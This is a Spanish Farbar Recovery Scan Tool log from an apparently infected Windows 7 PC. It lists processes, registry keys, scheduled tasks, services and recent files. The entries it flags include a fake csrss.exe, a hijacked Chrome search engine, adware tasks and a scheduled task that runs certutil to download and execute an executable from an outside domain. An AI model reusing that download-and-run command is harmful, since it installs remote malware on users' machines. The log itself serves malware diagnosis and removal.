Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 03-08-2021
Ejecutado por Joseba (administrador) sobre JOSEBA-PC (Hewlett-Packard G5251es) (04-08-2021 21:42:14)
Ejecutado desde C:\Users\Joseba\Desktop
Perfiles cargados: Joseba
Platform: Windows 7 Home Premium Service Pack 1 (X64) Idioma: Español (España, internacional)
Navegador predeterminado: Opera
Modo de Inicio: Normal

==================== Procesos (Lista blanca) =================

(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)

(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTShellHlp.exe
(Chengdu Zhagu Technology Co., Ltd. -> Smart Game Booster) C:\Program Files (x86)\PCGameBoost\Smart Game Booster\5.1.0\SgbTray.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(IObit Information Technology -> IObit) C:\Program Files (x86)\IObit\Driver Booster\8.2.0\Pub\PubPlatform.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub.exe <3>
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_agent.exe
(Logitech Inc -> Logitech, Inc.) C:\Program Files\LGHUB\lghub_updater.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Opera Software AS -> Opera Software) C:\Users\Joseba\AppData\Local\Programs\Opera GX\77.0.4054.275\opera.exe <19>
(Opera Software AS -> Opera Software) C:\Users\Joseba\AppData\Local\Programs\Opera GX\77.0.4054.275\opera_crashreporter.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe

==================== Registro (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [18390904 2021-01-09] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM\...\Run: [Riot Vanguard] => C:\Program Files\Riot Vanguard\vgtray.exe [564152 2021-05-21] (Riot Games, Inc. -> Riot Games, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-12-09] (Oracle America, Inc. -> Oracle Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restricción <==== ATENCIÓN
HKU\S-1-5-21-771737515-3687490794-2116205075-1000\...\Run: [LGHUB] => C:\Program Files\LGHUB\lghub.exe [123792288 2021-05-08] (Logitech Inc -> Logitech, Inc.)
HKU\S-1-5-21-771737515-3687490794-2116205075-1000\...\Run: [SolitaryRiver] => "C:\Windows\rss\csrss.exe" <==== ATENCIÓN
HKU\S-1-5-21-771737515-3687490794-2116205075-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-771737515-3687490794-2116205075-1000\...\MountPoints2: {06f97853-6801-11eb-aa1f-d48564bf8f06} - F:\setup.exe
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restricción <==== ATENCIÓN
HKLM\SOFTWARE\Policies\Google: Restricción <==== ATENCIÓN

==================== Tareas programadas (Lista blanca) ============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

Task: {2508A785-A449-4FED-AF53-EB8E594A118F} - System32\Tasks\SmartGameBooster SkipUAC (Joseba) => C:\Program Files (x86)\PCGameBoost\Smart Game Booster\5.1.0\SgbMain.exe [5802496 2021-03-08] (Chengdu Zhagu Technology Co., Ltd. -> Smart Game Booster)
Task: {30D12A3F-4ADC-4A6E-8D26-0F03409B2A85} - System32\Tasks\Avast Emergency Update => C:\Program Files\Avast Software\Avast\AvEmUpdate.exe
Task: {3DABFE9C-F3C3-489F-894A-F6E1C8B5FA9B} - System32\Tasks\SmartGameBooster Update => C:\Program Files (x86)\PCGameBoost\Smart Game Booster\5.1.0\SgbUpdater.exe [2819312 2021-02-02] (Chengdu Zhagu Technology Co., Ltd. -> Smart Game Booster)
Task: {51AD9E9A-E129-402C-959C-3DF4B162CF01} - System32\Tasks\{6D292163-3397-427D-8B61-EC02F5617CB3} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Patrician III - Imperio de los Mares\P3Setup.exe" -d "C:\Program Files (x86)\Patrician III - Imperio de los Mares"
Task: {5B6CDD08-7D5B-4476-9871-8E7FB19D7DE4} - System32\Tasks\Driver Booster Update => C:\Program Files (x86)\IObit\Driver Booster\8.2.0\AutoUpdate.exe [2268432 2020-12-23] (IObit Information Technology -> IObit)
Task: {763DFB9C-2335-49A3-9611-4ABE5004A718} - System32\Tasks\{98E14A7B-8564-411E-83CA-F363B27F7966} => C:\Windows\system32\pcalua.exe -a F:\install.exe -d F:\
Task: {7FC258D1-6517-485E-A5C7-D760F4DEE72E} - System32\Tasks\AdvancedWindowsManager #5 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
Task: {8FA174E8-8ACD-4379-8533-978CB4E2A47F} - System32\Tasks\AdvancedWindowsManager #3 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
Task: {8FE13298-5258-4199-B7BF-1D1583D0B2CD} - System32\Tasks\AdvancedUpdater => C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe [1010800 2021-05-07] (Microleaves LTD -> AW Manager) <==== ATENCIÓN
Task: {91C1028C-2373-40F9-BE37-291752839FC3} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Joseba\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Joseba\AppData\Local\Temp\csrss\scheduled.exe /31340 -> /C certutil.exe -urlcache -split -f hxxps://spolaect.info/app/app.exe C:\Users\Joseba\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Joseba\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATENCIÓN
Task: {92472A5A-E240-46FE-B41D-16F8433162E9} - System32\Tasks\Driver Booster Scheduler => C:\Program Files (x86)\IObit\Driver Booster\8.2.0\Scheduler.exe [152848 2020-12-23] (IObit Information Technology -> IObit)
Task: {A5978FC9-8179-4E05-9DA2-DEBA24BB8713} - System32\Tasks\AdvancedWindowsManager #4 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
Task: {A7DF7D80-CBF0-417F-A520-BF9B5524E426} - System32\Tasks\AdvancedWindowsManager #1 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
Task: {AB28B90F-E0DC-42E5-97CD-79B95BD5CCAF} - System32\Tasks\AdvancedWindowsManager #6 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
Task: {AED300CF-DAF1-4F3C-A883-A43142AAC203} - System32\Tasks\Opera GX scheduled Autoupdate 1627764089 => C:\Users\Joseba\AppData\Local\Programs\Opera GX\launcher.exe [1896656 2021-07-21] (Opera Software AS -> Opera Software)
Task: {BB396EA6-C016-4A10-9537-EEFA068CA42D} - System32\Tasks\IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132 => C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe [3098912 2020-11-05] (Intel(R) System Usage Report -> Intel Corporation)
Task: {D519E0C5-4E02-4970-A252-F85218694094} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\SystemInfoTool => C:\Users\Joseba\AppData\Roaming\\sysinfotool\\sitool.exe <==== ATENCIÓN
Task: {D772A996-8CD0-4E9B-8D09-87F06940514F} - System32\Tasks\AdvancedWindowsManager #2 => C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe <==== ATENCIÓN
Task: {D9F36630-E9C5-4A2B-BD85-DA5F9F69FC17} - System32\Tasks\Driver Booster SkipUAC (Joseba) => C:\Program Files (x86)\IObit\Driver Booster\8.2.0\DriverBooster.exe [8147400 2021-01-06] (IObit Information Technology -> IObit)
Task: {E4935E1F-9B4E-476B-9E2E-E6435EF9047A} - System32\Tasks\IntelSURQC-Upgrade-86621605-2a0b-4128-8ffc-15514c247132-Logon => C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe [3098912 2020-11-05] (Intel(R) System Usage Report -> Intel Corporation)
Task: {EDFBC15A-153C-44AD-AF3D-75388BD93566} - System32\Tasks\Sump Task (One-Time) => C:\Program Files (x86)\IObit\Driver Booster\8.2.0\sump.exe [1692752 2021-07-15] (IObit CO., LTD -> IObit)
Task: {FB29D8B0-AE65-4674-98F5-6EFC250A2606} - System32\Tasks\SmartGameBooster Startup => C:\Program Files (x86)\PCGameBoost\Smart Game Booster\5.1.0\SgbTray.exe [1766112 2021-03-02] (Chengdu Zhagu Technology Co., Ltd. -> Smart Game Booster)

(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)


==================== Internet (Lista blanca) ====================

(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)

Tcpip\Parameters: [DhcpNameServer] 212.142.173.37 8.8.8.8 212.142.173.36
Tcpip\..\Interfaces\{D4C3CB9E-9AFA-4B06-8A66-5B1CB23B5EBE}: [DhcpNameServer] 212.142.173.37 8.8.8.8 212.142.173.36

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled [Ningún archivo]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.10 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2020-04-23] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.281.2 -> C:\Program Files (x86)\Java\jre1.8.0_281\bin\dtplugin\npDeployJava1.dll [2021-02-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.281.2 -> C:\Program Files (x86)\Java\jre1.8.0_281\bin\plugin2\npjp2.dll [2021-02-10] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Ningún archivo]
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-02-02] (Adobe Inc. -> Adobe Systems Inc.)

Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default [2021-08-03]
CHR Notifications: Default -> hxxps://euw.op.gg; hxxps://twitter.com; hxxps://web.whatsapp.com; hxxps://www.reddit.com
CHR DefaultSearchURL: Default -> hxxps://www.ctcodeinfo.com/search?q={searchTerms}
CHR DefaultSearchKeyword: Default -> Custom
CHR Extension: (Presentaciones) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2020-11-29]
CHR Extension: (Documentos) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2020-11-29]
CHR Extension: (Google Drive) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-29]
CHR Extension: (MEGA) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2021-07-30]
CHR Extension: (YouTube) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-11-29]
CHR Extension: (Custom) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb [2021-07-21]
CHR Extension: (Hojas de cálculo) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-11-29]
CHR Extension: (OP.GG Extension) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbipjohhadjcagjjjhcooalfnkdlnfim [2021-01-04]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-07-16]
CHR Extension: (WhatsApp) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnpfjngllnobngcgfapefoaidbinmjnm [2020-12-07]
CHR Extension: (Web Safety) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhcmdonhekjhfbjmeacdjbhlfgpjabp [2021-02-05]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-02-02]
CHR Extension: (Gmail) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-29]
CHR Extension: (Chrome Media Router) - C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-05-26]
CHR Profile: C:\Users\Joseba\AppData\Local\Google\Chrome\User Data\System Profile [2021-07-30]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp]

Opera: 
=======
StartMenuInternet: (HKU\S-1-5-21-771737515-3687490794-2116205075-1000) Opera GXStable - "C:\Users\Joseba\AppData\Local\Programs\Opera GX\Launcher.exe"

==================== Servicios (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8914856 2021-07-21] (BattlEye Innovations e.K. -> )
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [5026616 2021-02-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)
S4 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [926176 2021-03-16] (Epic Games Inc. -> Epic Games, Inc.)
R2 LGHUBUpdaterService; C:\Program Files\LGHUB\lghub_updater.exe [10618272 2021-05-08] (Logitech Inc -> Logitech, Inc.)
S4 MaskVPNService; C:\Program Files (x86)\MaskVPN\mask_svc.exe [7493560 2020-08-06] (Global Media (Thailand) Co., Ltd -> Global Media (Thailand) Co., Ltd)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7477704 2021-08-03] (Malwarebytes Inc -> Malwarebytes)
S4 uncheater_bgl; C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe [2097008 2021-01-09] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10147296 2021-06-22] (Riot Games, Inc. -> Riot Games, Inc.)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
S2 AvastWscReporter; "C:\Program Files\Avast Software\Avast\wsc_proxy.exe" /runassvc /rpcserver [X]

===================== Controladores (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

R3 cpuz145; C:\Windows\temp\cpuz145\cpuz145_x64.sys [49968 2021-08-04] (CPUID -> CPUID)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [42256 2021-02-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [59360 2021-02-06] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 LGHUBTemperatureService; C:\Program Files\LGHUB\logi_core_temp.sys [22864 2021-05-08] (Logitech Inc -> Logitech)
S3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [67736 2018-10-05] (Logitech Inc -> Logitech Inc.)
R3 logi_joy_bus_enum; C:\Windows\System32\drivers\logi_joy_bus_enum.sys [37200 2021-03-19] (Logitech Inc -> Logitech)
R3 logi_joy_vir_hid; C:\Windows\System32\drivers\logi_joy_vir_hid.sys [25928 2021-03-19] (Logitech Inc -> Logitech)
R3 logi_joy_xlcore; C:\Windows\System32\drivers\logi_joy_xlcore.sys [66896 2021-03-19] (Logitech Inc -> Logitech)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [248992 2021-08-04] (Malwarebytes Inc -> Malwarebytes)
R3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 tapprotonvpn; C:\Windows\System32\DRIVERS\tapprotonvpn.sys [39696 2020-12-30] (Proton Technologies AG -> The OpenVPN Project)
S1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8241992 2021-06-22] (Riot Games, Inc. -> Riot Games, Inc.)
S3 AscFileFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileFilter.sys [X]
S3 AscRegistryFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscRegistryFilter.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)


==================== Un mes (creado) (Lista blanca) =========

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2021-08-04 21:42 - 2021-08-04 21:43 - 000017302 _____ C:\Users\Joseba\Desktop\FRST.txt
2021-08-04 21:41 - 2021-08-04 21:43 - 000000000 ____D C:\FRST
2021-08-04 21:40 - 2021-08-04 21:40 - 002300416 _____ (Farbar) C:\Users\Joseba\Desktop\FRST64.exe
2021-08-04 21:39 - 2021-08-04 21:39 - 000000732 _____ C:\Users\Joseba\Desktop\penis2.txt
2021-08-02 17:46 - 2021-08-02 17:46 - 006611920 _____ (EnigmaSoft Limited) C:\Users\Joseba\Downloads\SpyHunter-5.10-16-7044-Installer.exe
2021-08-01 16:29 - 2021-08-01 16:30 - 000000024 _____ C:\Users\Joseba\Desktop\Nuevo documento de texto.bat
2021-08-01 15:59 - 2021-08-01 15:59 - 000000019 _____ C:\Users\Joseba\Desktop\penis.vbs
2021-07-31 22:41 - 2021-07-31 22:41 - 000004086 _____ C:\Windows\system32\Tasks\Opera GX scheduled Autoupdate 1627764089
2021-07-31 22:41 - 2021-07-31 22:41 - 000001359 _____ C:\Users\Joseba\Desktop\Navegador Opera GX.lnk
2021-07-31 22:41 - 2021-07-31 22:41 - 000001359 _____ C:\Users\Joseba\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navegador Opera GX.lnk
2021-07-31 17:59 - 2021-08-04 16:49 - 000567616 _____ C:\Windows\ntbtlog.txt
2021-07-31 17:37 - 2021-07-31 17:38 - 000000000 ____D C:\Users\Joseba\Desktop\tboi
2021-07-31 16:30 - 2021-07-31 16:30 - 000000000 ___HD C:\$AV_ASW
2021-07-31 16:18 - 2021-07-31 16:18 - 000003910 _____ C:\Windows\system32\Tasks\Avast Emergency Update
2021-07-30 19:21 - 2021-08-03 23:04 - 000000000 ____D C:\ProgramData\Avast Software
2021-07-30 19:19 - 2021-08-03 23:39 - 000000000 ___HD C:\Users\Joseba\AppData\Roaming\WinHost
2021-07-30 19:19 - 2021-07-30 19:19 - 000000000 __SHD C:\Users\Joseba\AppData\Roaming\WinCFG
2021-07-30 19:18 - 2021-07-30 19:22 - 000000000 ____D C:\ProgramData\FH2EJGHUNVFN6HG6VIJ3EBNJ9
2021-07-30 19:18 - 2021-07-30 19:18 - 000000000 ____D C:\Program Files (x86)\Versium Research
2021-07-30 19:16 - 2021-07-30 19:16 - 000003824 _____ C:\Windows\system32\Tasks\AdvancedUpdater
2021-07-30 19:16 - 2021-07-30 19:16 - 000003800 _____ C:\Windows\system32\Tasks\AdvancedWindowsManager #6
2021-07-30 19:16 - 2021-07-30 19:16 - 000003800 _____ C:\Windows\system32\Tasks\AdvancedWindowsManager #5
2021-07-30 19:16 - 2021-07-30 19:16 - 000003800 _____ C:\Windows\system32\Tasks\AdvancedWindowsManager #4
2021-07-30 19:16 - 2021-07-30 19:16 - 000003800 _____ C:\Windows\system32\Tasks\AdvancedWindowsManager #3
2021-07-30 19:16 - 2021-07-30 19:16 - 000003800 _____ C:\Windows\system32\Tasks\AdvancedWindowsManager #2
2021-07-30 19:16 - 2021-07-30 19:16 - 000003800 _____ C:\Windows\system32\Tasks\AdvancedWindowsManager #1
2021-07-30 19:16 - 2021-07-30 19:16 - 000000000 ____D C:\Users\Joseba\AppData\Local\AdvinstAnalytics
2021-07-30 19:16 - 2021-07-30 19:16 - 000000000 ____D C:\Program Files (x86)\AW Manager
2021-07-30 19:13 - 2021-07-30 19:13 - 000224544 _____ (AVAST Software) C:\Users\Joseba\Downloads\avast_free_antivirus_setup_online (1).exe
2021-07-30 19:12 - 2021-07-30 19:12 - 000224544 _____ (AVAST Software) C:\Users\Joseba\Downloads\avast_free_antivirus_setup_online.exe
2021-07-22 16:34 - 2021-07-22 16:36 - 1415723523 _____ C:\Users\Joseba\Desktop\NOVA CARPETIÑA.zip
2021-07-22 16:27 - 2021-07-22 16:31 - 000000000 ____D C:\Users\Joseba\Desktop\NOVA CARPETIÑA
2021-07-22 16:20 - 2021-07-22 16:20 - 000000000 ____D C:\Users\Joseba\Downloads\TrackFolderChanges
2021-07-22 16:19 - 2021-07-22 16:20 - 000190030 _____ C:\Users\Joseba\Downloads\TrackFolderChanges.zip
2021-07-21 19:38 - 2021-08-03 23:51 - 000003496 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2021-07-21 19:38 - 2021-07-21 19:38 - 005552360 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2021-07-21 19:38 - 2021-07-21 19:38 - 000634272 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2021-07-21 19:37 - 2021-08-04 21:20 - 000000000 ___HD C:\Windows\rss
2021-07-21 19:34 - 2021-07-21 19:34 - 000000000 ____D C:\Users\Joseba\AppData\Local\Yandex
2021-07-21 19:33 - 2021-08-03 23:40 - 000000000 ____D C:\Users\Joseba\AppData\Roaming\closestep
2021-07-21 19:33 - 2021-07-21 19:33 - 000000000 ____D C:\Users\Joseba\AppData\Roaming\Adzuvt
2021-07-21 19:21 - 2021-08-03 23:39 - 000000000 ____D C:\Windows\trustedlogos
2021-07-21 19:19 - 2021-07-21 19:20 - 000000000 ____D C:\Program Files (x86)\MaskVPN
2021-07-21 19:14 - 2021-08-03 23:40 - 000000000 ____D C:\Users\Joseba\AppData\Local\netinfoapp
2021-07-21 19:01 - 2021-07-21 19:01 - 000000016 _____ C:\ProgramData\mntemp
2021-07-21 19:01 - 2021-07-21 19:01 - 000000000 ____D C:\Users\Joseba\AppData\Local\BattlEye
2021-07-21 18:44 - 2021-07-21 18:44 - 000000223 _____ C:\Users\Joseba\Desktop\COMBAT ARMS THE CLASSIC.url
2021-07-21 16:13 - 2021-08-03 23:40 - 000000000 ____D C:\Users\Joseba\AppData\Roaming\SysInfoTool
2021-07-21 16:13 - 2021-07-21 16:13 - 000000000 ____D C:\Users\Joseba\Downloads\Left 4 Dead 2
2021-07-21 16:13 - 2021-07-21 16:13 - 000000000 ____D C:\Users\Joseba\Desktop\Left 4 Dead 2
2021-07-21 16:12 - 2021-07-21 16:12 - 000688555 _____ C:\Users\Joseba\Downloads\Left 4 Dead 2.zip
2021-07-21 16:12 - 2021-07-21 16:12 - 000000748 _____ C:\Users\Joseba\Downloads\Left 4 Dead 2_Activation.txt
2021-07-16 19:13 - 2021-07-16 19:13 - 000000000 ____D C:\Users\Joseba\AppData\LocalLow\Pixonic
2021-07-16 19:03 - 2021-07-16 19:03 - 000000222 _____ C:\Users\Joseba\Desktop\War Robots.url
2021-07-16 18:56 - 2021-07-16 18:56 - 000000000 ____D C:\Users\Public\Documents\OnlineFix
2021-07-16 18:51 - 2021-07-16 18:52 - 004276737 _____ C:\Users\Joseba\Downloads\Is44cFix-OnlyePPTU2.rar
2021-07-15 23:40 - 2021-08-04 21:26 - 000003272 _____ C:\Windows\system32\Tasks\Sump Task (One-Time)

==================== Un mes (modificado) ==================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2021-08-04 21:26 - 2009-07-14 06:45 - 000025872 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2021-08-04 21:26 - 2009-07-14 06:45 - 000025872 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2021-08-04 21:19 - 2021-05-07 15:55 - 000000000 ____D C:\Users\Joseba\AppData\Local\LGHUB
2021-08-04 21:17 - 2021-05-07 15:55 - 000000000 ____D C:\Users\Joseba\AppData\Roaming\LGHUB
2021-08-04 21:16 - 2021-06-18 01:48 - 000000001 _____ C:\Windows\vgkbootstatus.dat
2021-08-04 21:16 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-08-04 17:07 - 2020-05-30 13:30 - 000248992 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2021-08-03 23:39 - 2020-05-30 11:47 - 000000000 ____D C:\Users\Joseba
2021-08-03 23:03 - 2020-05-30 13:30 - 000199128 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2021-08-03 23:01 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf
2021-08-03 22:59 - 2021-01-09 21:18 - 000000000 ____D C:\Users\Joseba\AppData\Roaming\IObit
2021-08-03 22:59 - 2021-01-09 21:18 - 000000000 ____D C:\Users\Joseba\AppData\LocalLow\IObit
2021-08-03 22:59 - 2021-01-09 21:18 - 000000000 ____D C:\ProgramData\IObit
2021-08-02 17:16 - 2009-07-14 07:08 - 000032522 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2021-08-01 23:53 - 2021-06-22 23:55 - 000007602 _____ C:\Users\Joseba\AppData\Local\Resmon.ResmonCfg
2021-08-01 23:19 - 2021-01-09 22:10 - 000000000 ____D C:\Program Files (x86)\Steam
2021-07-31 22:42 - 2021-01-09 20:57 - 000000000 ____D C:\Users\Joseba\AppData\Local\Opera Software
2021-07-31 22:40 - 2021-01-09 20:56 - 000000000 ____D C:\Users\Joseba\AppData\Roaming\Opera Software
2021-07-31 17:55 - 2020-11-28 17:00 - 001703814 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2021-07-31 17:55 - 2011-04-12 11:10 - 000750590 _____ C:\Windows\system32\perfh00A.dat
2021-07-31 17:55 - 2011-04-12 11:10 - 000159632 _____ C:\Windows\system32\perfc00A.dat
2021-07-31 17:31 - 2020-05-30 13:27 - 000000000 ____D C:\Program Files (x86)\Google
2021-07-31 16:51 - 2021-01-09 20:17 - 000000000 ____D C:\Program Files (x86)\PUBGLite
2021-07-31 16:18 - 2021-05-23 19:03 - 000000000 ____D C:\Users\Joseba\AppData\Local\CrashDumps
2021-07-30 21:51 - 2021-06-08 16:44 - 000000000 ____D C:\Users\Joseba\Downloads\Tor Browser
2021-07-30 20:38 - 2021-02-10 21:08 - 071757824 _____ C:\Windows\system32\config\SOFTWARE.iobit
2021-07-30 20:38 - 2021-02-10 21:08 - 001859584 _____ C:\Windows\system32\config\DEFAULT.iobit
2021-07-30 20:38 - 2021-02-10 21:08 - 000061440 _____ C:\Windows\system32\config\SAM.iobit
2021-07-30 20:38 - 2021-02-10 21:08 - 000024576 _____ C:\Windows\system32\config\SECURITY.iobit
2021-07-30 17:44 - 2021-01-09 21:19 - 000000000 ____D C:\ProgramData\ProductData
2021-07-21 18:59 - 2020-11-25 20:52 - 000000000 ____D C:\ProgramData\Package Cache
2021-07-16 17:59 - 2021-06-20 16:06 - 000000000 ____D C:\Games
2021-07-16 17:36 - 2021-06-18 01:23 - 000000000 ____D C:\Program Files\Riot Vanguard
